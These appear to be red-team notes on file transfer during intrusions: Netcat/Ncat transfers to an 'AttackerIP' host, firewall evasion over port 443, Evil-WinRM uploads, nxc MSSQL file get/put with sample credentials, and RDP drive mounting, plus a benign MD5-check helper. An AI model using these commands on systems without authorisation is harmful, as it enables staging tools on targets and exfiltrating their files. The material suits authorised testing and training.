Uncommon yet useful
Here we’ll explore some uncommon but useful methods for file transfer.
File Hash
Always verify the MD5 checksum of a file on both the target and attack hosts after transfer to ensure it wasn't corrupted or altered. It's a good habit for file integrity checks.
# Bash
md5sum filename
# PowerShell
Get-FileHash filename -Algorithm MD5
# Cmd
certutil -hashfile filename MD5
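The three commands above print the digest in different shapes (md5sum appends the file name, Get-FileHash prints upper-case hex, and older certutil builds separate the bytes with spaces), so comparing by eye is error-prone. The helper below is an added example, not part of the original notes; the function names are made up for illustration and it assumes md5sum is available on the host doing the check.

```shell
#!/bin/sh
# Added example: compare a local file's MD5 with a digest pasted from the other host.
# Function names are hypothetical; assumes coreutils md5sum is installed.

# normalize_digest: strip whitespace and lower-case the hex, so PowerShell's
# upper-case output and space-separated certutil output compare equal.
normalize_digest() {
    printf '%s' "$1" | tr -d ' \t\r\n' | tr 'A-F' 'a-f'
}

# local_md5: print only the hex digest. Reading from stdin keeps the file name
# out of md5sum's output (it prints "digest  -").
local_md5() {
    md5sum < "$1" | cut -d' ' -f1
}

# verify_transfer FILE EXPECTED
# Returns 0 on match, 1 on mismatch, 2 on unusable input.
verify_transfer() {
    file=$1
    expected=$(normalize_digest "$2")
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    # An MD5 digest is exactly 32 hex characters; reject truncated or mangled pastes.
    case $expected in
        *[!0-9a-f]*) echo "expected digest is not hex" >&2; return 2 ;;
    esac
    [ "${#expected}" -eq 32 ] || { echo "expected digest is not 32 hex chars" >&2; return 2; }
    actual=$(local_md5 "$file")
    if [ "$actual" = "$expected" ]; then
        echo "OK $file $actual"
        return 0
    fi
    echo "MISMATCH $file: local=$actual expected=$expected" >&2
    return 1
}
```

Call it as verify_transfer ./filename "digest copied from the other host"; a non-zero return means the file should be transferred again.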
Transfer Techniques
Netcat/Ncat
If we need a static binary, some are available here: https://github.com/andrew-d/static-binaries
# Attacker -> Target
nc -nvlp 6969 > filename # Listen on Target Machine (Netcat)
ncat -nvlp 6969 --recv-only > filename # Listen on Target Machine (Ncat)
nc -q 0 TargetIP 6969 < filename # Send from Attacker (Netcat)
ncat --send-only TargetIP 6969 < filename # Send from Attacker (Ncat)
# Target -> Attacker (Reverse transfer)
nc -nvlp 6969 -q 0 < filename # Listen on Attacker (Netcat)
ncat -nvlp 6969 --send-only < filename # Listen on Attacker (Ncat)
nc AttackerIP 6969 > filename # Receive on Target (Netcat)
ncat AttackerIP 6969 --recv-only > filename # Receive on Target (Ncat)
# Note:
# If inbound connections are blocked by a firewall, reverse the flow:
# - Swap '<' and '>' in the commands
# - Use common outbound ports like 443
Evil-WinRM
Evil-WinRM is a tool that leverages WinRM but wraps it in a simple interface for red teamers. It has built-in upload and download commands for transferring files.
upload /path/to/local/file
download C:\path\to\target\file
CrackMapExec
# Attack Host -> Target Host
nxc mssql 10.10.10.10 -u "sqlsvc" -p "Password123@" --local-auth --put-file /etc/passwd C:/Users/Public/passwd
# Target Host -> Attack Host
nxc mssql 10.10.10.10 -u "sqlsvc" -p "Password123@" --local-auth --get-file C:/Windows/System32/drivers/etc/hosts hosts
# - Other protocols also support the --get-file and --put-file options.
# - If we have admin permissions (Pwn3d!), we can upload and download files from the system.
# - It can also be used to upload and download to/from SMB shares.
xFreeRDP/RDesktop
If we have an RDP session using either xfreerdp or rdesktop, we can copy files from the attack host and paste them to the target host.
However, if we copy a file from the target and try to paste it to the attack host, it doesn’t work. To solve this, we can mount a local resource on the target RDP server.
# XFreeRDP
xfreerdp /v:'10.10.10.10' /d:'rezydev.local' /u:'rezydev' /p:'Coolpass123@' /drive:linux,/home/rezydev/transferfiledirectory
# RDesktop
rdesktop 10.10.10.10 -d rezydev.local -u rezydev -p 'Coolpass123@' -r disk:linux='/home/rezydev/transferfiledirectory'
# After connecting, browse to '\\tsclient\' in the RDP session to reach the mounted directory and transfer files